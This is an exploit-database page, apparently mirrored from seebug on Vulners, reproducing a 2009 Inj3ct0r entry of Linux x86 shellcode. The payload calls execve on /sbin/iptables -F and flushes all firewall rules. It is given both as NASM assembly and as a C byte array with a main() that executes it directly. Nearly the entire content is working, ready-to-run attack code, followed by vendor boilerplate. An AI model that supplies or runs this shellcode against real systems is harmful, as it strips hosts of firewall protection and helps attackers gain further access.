Lucene search
+L

linux/x86 /sbin/iptables -F

🗓️ 07 Nov 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

Linux x86 iptables firewall rese

Code

                                                ===========================
linux/x86 /sbin/iptables -F 
===========================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


        global _start
_start:
        xor eax,eax
        xor edx,edx
	push eax
        push word 0x462d
        mov edx,esp
        push eax
        push 0x73656c62
        push 0x61747069
        push 0x2f6e6962
        push 0x732f2f2f
        mov ebx,esp
        push eax
        push edx
        push ebx
        mov ecx,esp
        xor edx,edx
        mov al,0xb
        int 0x80

const char sc[] =
"\x31\xc0"                      //xor    %eax,%eax
"\x31\xd2"                      //xor    %edx,%edx
"\x50"                          //push   %eax
"\x66\x68\x2d\x46"              //pushw  $0x462d
"\x89\xe2"                      //mov    %esp,%edx
"\x50"                          //push   %eax
"\x68\x62\x6c\x65\x73"          //push   $0x73656c62
"\x68\x69\x70\x74\x61"          //push   $0x61747069
"\x68\x62\x69\x6e\x2f"          //push   $0x2f6e6962
"\x68\x2f\x2f\x2f\x73"          //push   $0x732f2f2f
"\x89\xe3"                      //mov    %esp,%ebx
"\x50"                          //push   %eax
"\x52"                          //push   %edx
"\x53"                          //push   %ebx
"\x89\xe1"                      //mov    %esp,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xb0\x0b"                      //mov    $0xb,%al
"\xcd\x80";                      //int    $0x80
       
main(){
      int (*shell)();
      shell=sc;
      shell();
    }

----------------------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Nov 2009 00:00Current
7.1High risk
Vulners AI Score7.1
9